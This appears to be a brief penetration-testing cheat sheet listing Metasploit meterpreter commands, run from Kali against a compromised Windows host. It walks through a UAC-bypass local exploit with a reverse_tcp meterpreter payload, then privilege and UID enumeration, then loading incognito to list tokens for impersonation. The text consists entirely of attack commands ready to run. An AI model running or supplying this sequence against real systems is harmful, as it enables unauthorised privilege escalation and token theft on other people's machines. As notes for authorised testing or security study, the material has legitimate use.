From Kali -> Foothold Windows
UAC bypass
meterpreter > use exploit/windows/local/bypassuac_injection_winsxs
meeterpreter > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > set target Windows x64
meterpreter > set SESSION 1
meterpreter > run
# Successfully escalate the privs
# Received a new meterpreter session
Getting privileges of current user
meterpreter > getprivs
Getting UID
meterpreter > getuid
meterpreter > load incognito
List tokens
meterpreter > list_tokens -u